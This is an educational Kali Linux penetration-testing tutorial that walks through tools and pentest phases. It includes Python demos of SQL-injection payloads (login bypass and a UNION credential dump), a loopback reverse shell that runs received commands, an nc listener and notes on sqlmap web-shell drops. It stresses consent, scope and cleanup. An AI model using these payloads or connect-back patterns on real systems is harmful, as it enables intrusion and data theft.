Kali Linux Penetration Testing Tutorial: Step-By-Step Process (2023)

Kali Linux turns 10 this year, and to celebrate, the Linux penetration testing distribution has added defensive security tools to its arsenal of open-source security tools.

It remains to be seen if Kali Purple will do for defensive open source security tools what Kali Linux has done for open source pentesting, but the addition of more than 100 open source tools for SIEM, incident response, intrusion detection and more should raise the profile of those defensive tools.

For now, Kali is primarily known for its roughly 600 open source pentesting tools, allowing pentesters to easily install a full range of offensive security tools.

In this article, we’ll focus primarily on how to use this powerful OS to run a pentest and mistakes to avoid. We’ll give you an overview of what can be achieved with Kali Linux using a short selection of pre-installed tools. While this guide serves as an introduction to common pentesting phases, with practical examples that highlight best practices, it’s not a substitution for a complete professional pentesting methodology.

Also read:

  • 24 Top Open Source Penetration Testing Tools
  • How to Implement a Penetration Testing Program in 10 Steps


What is Kali Linux?

Kali Linux is a popular pentesting distribution maintained by Offensive Security (OffSec), a 15-year-old private security company. Kali contains scanners, sniffers, and many other attacking tools.

The OS can power a full pentest session or more specific attacks. While there are many other pentesting distributions, Kali is the top one recommended by professionals.

Most of its pre-installed tools are also available as standalone packages, but Kali integrates and maintains them as a curated, consistently packaged set meant for professional use.

The idea behind the operating system is to have a comprehensive toolbox that is relatively easy to update while following the best standards in the industry.

Kali is built for pentesting only. That’s why you won’t want to install it as a primary OS unless your machine is dedicated to pentesting or it’s a virtual machine.

What’s new in Kali 2023.1?

Kali 2023.1 introduces a new kernel version and eight new packages, including CyberChef, a browser-based workbench for encoding, decoding, decrypting and otherwise transforming data (strings, hashes, binary blobs) one operation at a time, which is convenient when a target hands you something you need to decode quickly.

Python 3.11.2, due in Debian’s upcoming stable release, also changes how pip behaves: on a system whose Python is marked as externally managed (PEP 668), a plain pip install outside a virtual environment is refused. The Kali team says this will affect all Debian-based distributions, including Kali, so it shipped a temporary patch to soften the transition. The durable habit is to install Python tools into a virtual environment (python3 -m venv) or with pipx rather than system-wide.

The Kali team also warned that all Linux distributions could be affected by a bug with Nvidia drivers and some specific GPU models. Impacted devices might become slow or freeze. In such cases, there’s not much you can do except remove the Nvidia drivers and wait for a fix.

The other major addition in this release is the Purple Edition for defensive security, which we’ll cover further down.

It’s also worth mentioning updates to the Xfce and KDE Plasma desktops. Kali users will also get new wallpapers and new boot and login screens.

You can inspect the full changelog to get all the details about this release.

Is Kali beginner-friendly?

Kali is available for anyone. It’s free and open-source, so anyone can download it. It’s a good idea to try things on your own and then read the documentation or tutorials.


However, is it a good place for beginners to start? While Kali IS beginner-friendly, professional pentesting is not something you can improvise. It requires knowledge and planning to be effective.

Here are some requirements for becoming a good pentester:

  • Mastery of pentesting basics: legal aspects, scopes, essential steps (such as passive recon, network discovery, enumeration, privilege escalation), post-exploitation, and persistence
  • Mastery of the network layers (the OSI model, IP, subnets, and more)
  • Mastery of Windows and Linux systems
  • Proficiency in Python and some programming languages (like Go, C, C++, Ruby); in my opinion, this isn’t optional, but some security specialists might say otherwise

Some people learn faster than others, but there’s a massive range of tools and concepts to know, so it will take time regardless of your learning skills or speed.

Getting Started: How to Install Kali Linux

Kali Linux is remarkably easy to install. The “Get Kali” page lists various installation modes, with pre-configured images and ready-to-use virtual machines.

Virtual machines are perfect for a quick intro. Feel free to test them, even if it’s just to see what the OS looks like.

Images exist for most platforms, including Docker containers, Android (via Kali NetHunter) and the Raspberry Pi. Windows users can install Kali in the Windows Subsystem for Linux (WSL2), for example.

The bare metal installation is not recommended for beginners, though.

You can flash ISO images on an external drive to install Kali on the device of your choice by booting from that drive.

You can also run Kali in live mode with the live distributions without installing it on your device.

Mistakes to avoid with Kali Linux

Without proper knowledge, your pentest will likely fail, as there’s no magic recipe you can apply blindly regardless of how good your tools are.

Besides, attacking tools can send many probes and telltale headers along with their requests (e.g., during scanning and discovery), which security tools can detect and block. Note that Kali won’t hide your IP or cover your fingerprints automagically. You may use a VPN, route your traffic through a pivot host with SSH port forwarding, or configure proxychains.

You may also leverage external platforms like Linode for your setup and operations.

However, if you are a complete newbie, my advice is to not rush on the tools, and to start with free open-source projects to attack, like the Juice Shop or many other vulnerable applications that are meant to help you learn cybersecurity.

Then you might want to learn more advanced techniques or to invest in dedicated online training programs (see the final section of this article).

Pentesting is not just about servers and web apps

A penetration test aims to emulate a real attack on a targeted system. It’s actually a broad term that covers a wide range of tests and procedures, not just for web apps, and organizations can leverage regular pentests to improve their security and fix critical vulnerabilities.

Unlike vulnerability assessments, pentests involve exploitation, which means you, as an attacker, will hack the system, for real, according to the rules defined before the test. The ultimate goal is to write a good report that provides recommendations.

Note that your pentest is not an exhaustive analysis, as you will likely have limited time and only need one working exploit to achieve your mission.

It’s important to bear in mind that pentesting is not limited to hacking vulnerable servers that host apps and databases. There are multiple other attack angles to test, including:

  • Network compromises
  • Social engineering (e.g., phishing)
  • Memory corruptions
  • Wi-Fi attacks

Kali is a wonderful toolbox because it has tools for a wide range of pentests. Web apps are good for learning because many web servers are vulnerable and expose a large attack surface: organizations have no choice but to expose them to the public Internet.

However, if it’s necessary (and in the contract), a pentester can perform physical attacks too.


Don’t neglect the legal aspects

Laws are not the same everywhere, which means the same procedures can be legal in some countries and illegal in others. It’s especially true if you compare the EU to the U.S.

As far as I know, “Ethical hacking” is not a legally protected status. Legitimate security researchers have been sued after demonstrating critical vulnerabilities.

Scope is essential for distinguishing a pentest from a real attack. Of course, you need an explicit consent, which is usually a legal agreement, to run a pentest, but you must also define the scope very precisely before the operation.

Last but not least, installing Kali Linux at work without permission would raise liabilities too. The distribution contains sensitive programs that can expose your organization, not to mention jeopardize your employment.

Using Kali Linux: Finding Tools

There are literally hundreds of Kali Linux tools for various purposes. Beginners can start with very popular packages for classic and recurrent tasks, or they could ask security pros for their favorite tools.

While the list of tools can provide some hints, it can be confusing for beginners. Here’s a range of pentest tasks and the appropriate Kali Linux tools:

  • OSINT: Use Maltego to gather information, Dmitry for passive recon
  • Social Engineering: Use SET (the Social Engineer Toolkit)
  • Knowledge base: Use exploitdb
  • pentesting framework: Use the Metasploit Framework
  • Port scanning: Use Nmap to scan the targeted network and Ndiff to compare two Nmap scans saved as XML (-oX), e.g., to see which ports were opened or closed between runs
  • Wireless pentesting: Use Aircrack-ng to crack Wi-Fi, Bettercap for recon and MitM attacks on Wi-Fi and BLE (Bluetooth Low Energy) devices
  • Packet sniffing: Use Scapy to manipulate packets, Ettercap is also excellent to perform MitM attacks, and Wireshark is a must-have
  • Brute-Force URLs: Use Gobuster or DirBuster to scan URLs (directories, files, and DNS), and Nikto to detect server vulnerabilities
  • Web fuzzing: Use Wfuzz
  • Web hacking: Use BeEF to exploit XSS and other vulnerabilities with the browser or the Burp Suite to intercept requests
  • SQL injections: Use sqlmap to detect and exploit injectable parameters and dump vulnerable databases
  • WordPress scanning: Use WPscan
  • Brute-Force logins remotely: Use Hydra (Hydra GTK for the graphical interface)
  • Brute-Force passwords: Use John The Ripper
  • Active Directory: Use Mimikatz, Impacket

The lists won’t tell you how to use each tool or the right combination to achieve your mission. Once installed, however, Kali Linux sorts packages by categories, which adds some helpful context and labels.

The category usually matches the typical phases of a pentest, like “information gathering” or “post-exploitation,” but also recurrent tasks, such as “password attacks.”

Just open the applications menu, where each tool is listed under its category.


Using a Pentesting Framework

The Metasploit Framework can support many steps of your work, from scanning and discovery to exploitation, and even post-exploitation.

On Kali, just open the interactive menu or type “msfconsole” in the terminal to start the console.


The console is verbose, so you’ll know quickly whether the exploit has succeeded. In my experience, the interface provides advanced payload capabilities and a standardized way to use very different hacking modules.

Note that you don’t have to use a framework, but you’ll have to combine several other pre-installed resources to achieve similar results. If you don’t like manual setups (e.g., for listeners) and other repetitive procedures, the console is a great option.

Of course, some cases may require other tools.

Also read: Getting Started With the Metasploit Framework: A Pentesting Tutorial

Step 1: Defining Scope and Goals

Clear goals and scope are critical to the success of your pentest. You and the organization define the scope and the rules that apply during the test, so there is no misunderstanding about what is targeted and what a successful test looks like.

Your customer will likely have to choose between three common approaches for the test:

  • Black box: You operate without any prior access or information about the target, as an external attacker would, and usually focus on gaining initial access
  • Gray box: An intermediate approach where you are given some credentials or internal information (a user account, network ranges, documentation) to speed up your progress and allow deeper testing
  • White box: You get full information (architecture, configuration, source code, privileged accounts). These tests are usually longer and can concentrate on the later phases, like post-exploitation or persistence, to see how resilient the system is against privilege escalation, insider threats, or lateral movement

Not all organizations will need a white box test that requires significant time and budget, but it’s sometimes necessary.

You must discuss the timeline and other legal conditions during this step too. It’s critical for your customers to explain in detail what’s allowed and what’s not in a document that will be signed by you and them.

Unannounced “wild” attacks may seem more realistic to beginners, but in practice it is common to allowlist the pentesters’ source IPs on the firewall, WAF or IDS, so that the limited test time is spent finding vulnerabilities rather than evading controls the client already knows about. You need to define a methodology and agree on it up front.


Step 2: Recon and OSINT

Reconnaissance, or “recon,” can be either passive or active.

For example, OSINT (Open-source Intelligence) is passive: you gather what is already public (DNS records, certificates, job postings, leaked credentials) without sending a single packet to the target, whereas Nmap is active, since you send probes to the targeted network and those probes can be logged.

Kali has powerful OSINT tools, like Maltego (the community edition is free to use). These programs can help you organize and automate your research.

In any case, you will generally need both passive and active recon during your pentest.


Step 3: Scan and Discover

Let’s say we have an IP/URL to scan. We can use classic Nmap commands to discover services and potential hosts to attack, for example:

nmap -oN nmapscan.txt -v -A {IP/URL}

The -v option is for “verbose.” -A enables OS detection, version detection, the default NSE scripts, and traceroute, which is slower and sends far more probes to the target than a plain port scan, but that’s not a problem here, as we are in a lab rather than a real engagement (OS detection also requires root privileges). The -oN option writes the human-readable “normal” output to a text file; use -oX for XML, which Ndiff and most parsers expect, or -oA basename to get the normal, grepable and XML formats in one run.
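Comparing two scans is how you notice that a port the client said was firewalled is now reachable, or that a service was upgraded between test windows. The following is an added example, not code from the article or from the Nmap project: it parses two constructed, trimmed-down Nmap -oX documents for a made-up host (10.0.0.5, invented ports and version strings) and reports which open ports appeared, disappeared, or changed banner, which is the core of what Ndiff does for you.

```python
import xml.etree.ElementTree as ET

# Constructed sample data: two trimmed-down Nmap -oX documents for one host.
# These are not real scan results; the host, ports and versions are made up.
SCAN_BEFORE = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -oX before.xml 10.0.0.5">
  <host>
    <status state="up"/>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="8.9p1"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Apache httpd" version="2.4.52"/></port>
      <port protocol="tcp" portid="3306"><state state="open"/><service name="mysql" product="MySQL" version="8.0.32"/></port>
      <port protocol="tcp" portid="8080"><state state="closed"/><service name="http-proxy"/></port>
    </ports>
  </host>
</nmaprun>
"""

SCAN_AFTER = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -oX after.xml 10.0.0.5">
  <host>
    <status state="up"/>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="8.9p1"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Apache httpd" version="2.4.57"/></port>
      <port protocol="tcp" portid="3306"><state state="filtered"/><service name="mysql"/></port>
      <port protocol="tcp" portid="8080"><state state="open"/><service name="http" product="Jetty" version="9.4.50"/></port>
    </ports>
  </host>
</nmaprun>
"""


def parse_open_services(xml_text):
    """Map (ip, protocol, port) -> service banner for every open port of every live host."""
    root = ET.fromstring(xml_text)
    services = {}
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        address = host.find("address[@addrtype='ipv4']")
        if address is None:
            continue
        ip = address.get("addr")
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not part of the exposed surface
            svc = port.find("service")
            fields = (svc.get("name"), svc.get("product"), svc.get("version")) if svc is not None else ()
            banner = " ".join(f for f in fields if f) or "unknown"
            services[(ip, port.get("protocol"), int(port.get("portid")))] = banner
    return services


def diff_scans(before_xml, after_xml):
    """Ndiff-style comparison: which open ports appeared, disappeared, or changed banner."""
    before = parse_open_services(before_xml)
    after = parse_open_services(after_xml)
    common = set(before) & set(after)
    return {
        "opened": sorted(set(after) - set(before)),
        "closed": sorted(set(before) - set(after)),
        "changed": sorted((key, before[key], after[key]) for key in common if before[key] != after[key]),
    }


if __name__ == "__main__":
    for kind, entries in diff_scans(SCAN_BEFORE, SCAN_AFTER).items():
        print(f"{kind}:")
        for entry in entries:
            print(f"  {entry}")
```

With real output, save each run with nmap -oX before.xml ... and nmap -oX after.xml ..., then either feed the files to this script or run ndiff before.xml after.xml directly; the XML is what both consume, the -oN text file is for humans.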

If we discover that the server hosts a vulnerable database system, we will attack it.

Step 4: Gain Unauthorized Access and Exploit

SQL injections in a vulnerable database can lead to a Remote Code Execution (RCE).

If we manage to inject SQL queries into the targeted database with sqlmap, we may exploit a typical weakness that lets the database write files, which can be used to drop a web shell and pass arbitrary commands to the server. On MySQL this is the SELECT ... INTO OUTFILE route that sqlmap’s --os-shell option automates; it only works if the database account has the FILE privilege, secure_file_priv does not block the target directory, and you know a web-root path the database process can write to.
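Here is an added example (not from the original article or from the sqlmap project) that shows, on a throwaway SQLite database built inside the script, the pattern sqlmap probes for: a login query assembled by string concatenation, an authentication-bypass payload, a UNION payload that dumps other users’ passwords, and the parameterized query that defeats both. The users table, the accounts and the passwords are constructed for the demo. SQLite has no INTO OUTFILE, so the file-write step that turns injection into command execution on MySQL is not reproduced here; the injection itself is the same.

```python
import sqlite3


def make_demo_db():
    """Constructed demo database with invented accounts (not real credentials)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("alice", "s3cret!", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """The injectable pattern: user input is pasted straight into the SQL text."""
    query = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchall()


def login_safe(conn, username, password):
    """Same query with bound parameters: input is treated as data, never as SQL syntax."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


# Payloads of the kind sqlmap generates automatically.
BYPASS_PAYLOAD = "alice' -- "   # closes the string, then comments out the password check
DUMP_PAYLOAD = "' UNION SELECT username, password FROM users -- "  # pulls columns from another query


def demo(login):
    """Run a legitimate login and both payloads through the given login function."""
    conn = make_demo_db()
    return {
        "legit": login(conn, "alice", "s3cret!"),
        "bypass": login(conn, BYPASS_PAYLOAD, "wrong-password"),
        "dump": sorted(login(conn, DUMP_PAYLOAD, "wrong-password")),
    }


if __name__ == "__main__":
    print("vulnerable:", demo(login_vulnerable))
    print("safe:      ", demo(login_safe))
```

With the vulnerable function the bypass payload logs in as alice without her password and the UNION payload returns every username and password in the table; with the parameterized version both payloads simply fail to match any row. sqlmap does exactly this discovery work, then escalates to --dump, --os-shell or --sql-shell depending on what the database account is allowed to do.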

Many exploits consist in uploading or launching a reverse shell, which is basically a “connect-back” channel: the target opens a connection to a listener on your machine (for example nc -lvnp 4444), which sidesteps inbound firewall rules that would block you from connecting in.

If such a shell can be opened as a privileged user (e.g., administrator), we’ll get the same privileges for our session!

The root account grants the highest privileges, allowing pretty much any operation, including tampering with logs and security agents, which makes it the prize for post-exploitation. It does not make you invisible, though: centralized logging and EDR can still record what root does, so treat detection as part of what the test measures.
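To make the “connect-back” idea concrete, here is an added example (not code from the article) that runs both ends of a reverse shell on the loopback interface in one process: a listener thread playing the tester’s Kali box accepts the connection, sends one command and collects its output, while the client function playing the compromised host connects out, executes what it received and sends the result back. In a real test the two sides are separate machines, the listener is typically nc -lvnp on your box, and the target keeps a shell open rather than running a single command; the OS-chosen port and the harmless echo command are assumptions of the demo.

```python
import socket
import subprocess
import threading


def operator_listener(server_socket, command, captured):
    """Tester's side: accept the connect-back, send one command, collect the reply."""
    conn, _ = server_socket.accept()
    with conn:
        conn.sendall(command.encode() + b"\n")
        conn.shutdown(socket.SHUT_WR)  # EOF tells the other side the command is complete
        captured.append(b"".join(iter(lambda: conn.recv(4096), b"")).decode())


def victim_connect_back(host, port):
    """Compromised host's side: connect out, run what arrives, send the output back."""
    with socket.create_connection((host, port)) as sock:
        command = b"".join(iter(lambda: sock.recv(4096), b"")).decode().strip()
        # This is the dangerous part of any reverse shell: remote input becomes a local command.
        result = subprocess.run(command, shell=True, capture_output=True, text=True)
        sock.sendall((result.stdout + result.stderr).encode())
    return command


def demo_connect_back(command="echo connect-back works"):
    """Run listener and client on 127.0.0.1 and return what the listener captured."""
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port (demo assumption)
    server_socket.listen(1)
    port = server_socket.getsockname()[1]
    captured = []
    listener = threading.Thread(target=operator_listener, args=(server_socket, command, captured))
    listener.start()
    victim_connect_back("127.0.0.1", port)
    listener.join()
    server_socket.close()
    return captured[0]


if __name__ == "__main__":
    print(demo_connect_back().strip())
```

Note the direction of the TCP connection: the target initiates it, so only outbound traffic from the target to your listener needs to be allowed, which is why egress filtering on servers is such an effective control against this class of post-exploitation.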

Step 5: Post-exploitation

After exploiting a vulnerability and compromising a network, you may want to show what you can do with it to your customers to prove the impact and the risks associated with the breach.

Metasploit has tons of modules for this purpose, but you can open the interactive menu of Kali Linux to get the full list of post-exploitation tools available:


If it’s a Windows/Active Directory environment, Kali has several packages for that, like Mimikatz, a small but powerful utility for dumping credentials from memory and extracting or forging Kerberos tickets, or Impacket, a Python collection of protocol implementations with attack scripts such as secretsdump, GetUserSPNs (Kerberoasting) and psexec.

Depending on the brief and the size of the organization, you may have to go further and move from the system you’ve just compromised to another, using it as a foothold to reach networks you could not see from the outside.

This technique is called pivoting. You may also have to demonstrate persistence, that is, that you can maintain access over time, and get deeper into the targeted infrastructure.

Step 6: Clean Up Your Mess

The targeted network must be returned to the state it was in before your operation, which means removing all temporary accounts, uploaded scripts and web shells, scheduled tasks, and any other modifications you made on the system.

This phase is usually skipped during a CTF (Capture The Flag event) because the goal is to practice attacking techniques, but in real-world conditions a pentester must remove every artifact and, for anything that cannot be removed safely, document it in the report so the client can clean it up. This is not about covering your tracks: the client’s logs of your activity should stay intact, since they are also evidence of what their detection did and did not catch.

Step 7: Report and Make Recommendations

During this step, you will write a report containing the vulnerabilities you’ve just exploited, the potential stolen data, and the recommendations to fix the situation, including technical advice.


The report is the heart of a pentest and a critical document that literally determines the value of your work. It has to be meaningful and readable, so the organization can take concrete decisions to secure its network.

It may contain the following items:

  • Techniques used to gather intelligence
  • Techniques used to gain unauthorized access
  • The threat model and the level of risks
  • The estimated value of stolen data and credentials

You must prioritize the most relevant measures. Watch this tutorial by Hackersploit to learn more.

Open-source Alternatives to Kali Linux

There are some alternatives to Kali Linux worth considering.

Parrot OS Security Edition

Parrot OS Security should be very convenient for beginners, with lots of default configurations. Be careful when downloading the image, though, as Parrot provides a “home edition” that is not meant for pentesting.

You’ll need the “security” edition. It’s still possible to install the home edition and the pentesting tools afterwards, but the security edition is more straightforward.

What I like about Parrot is the ease of use and the privacy-focused approach (no telemetry, anon surf, proxy).

The “Hack The Box Edition” is also worth mentioning. It aims to help beginners quickly set up a machine for a CTF (e.g., on the HTB platform), but you can use it to build a lab or a training environment for other objectives.

Black Arch Linux

You may have read that Arch is for “the real ones” (not beginners), as the installation is said to be more technical compared to many other Linux distros.

That’s not exactly true, as the latest versions are way easier to install compared to the oldest ones. You can now download a “slim” version too.

If you already use Arch, you can “upgrade” your installation to Black Arch with a dedicated installer in minutes.

Linux users may appreciate the core philosophy, which is very different from other distros like Ubuntu or Debian, and the ability to get the latest versions of security packages.


Kali Purple Edition

The Kali “Purple” edition was released recently and ships many popular packages for defensive security, including Yara and DefectDojo. There’s also a large range of forensic and reversing tools to discover.

The team added specific menus that follow the principles of the NIST Cybersecurity Framework: identify, protect, detect, respond, recover.

Users should be aware that this initiative is in its early stages, so you won’t get pre-configured VMs and the large support provided by the standard version.

Of course, you’re not supposed to migrate your current working environment to Purple right now; this edition is not yet mature enough for that.

However, it’s stable enough to be tested, and defenders will certainly appreciate this new flavor despite the inevitable bugs and oversights.

It’s interesting to see OffSec exploring new fields. The Purple edition is aimed at Blue and Purple teams for defensive security, which means it’s a mix of both worlds, red and blue.

You can get more details about Kali Purple in the official wiki.


Resources for Kali Linux Training

Kali Linux requires effort and time. The key is to practice regularly and to learn from professionals in the field if you want to make it a career. An ethical hacking certification may help too.



Bottom Line: Kali Linux

Kali Linux deserves its great reputation as a critically important toolkit for pentesters and anyone hoping to become one. If your organization contains critically important data, whether web-facing or internal, pentesting is a cybersecurity best practice you should adopt to find vulnerabilities before the bad guys do. Kali Linux is a great place to start.

Further reading:

  • 10 Best Open-Source Vulnerability Scanners for 2023


Article information

Author: Annamae Dooley

Last Updated: 24/09/2023
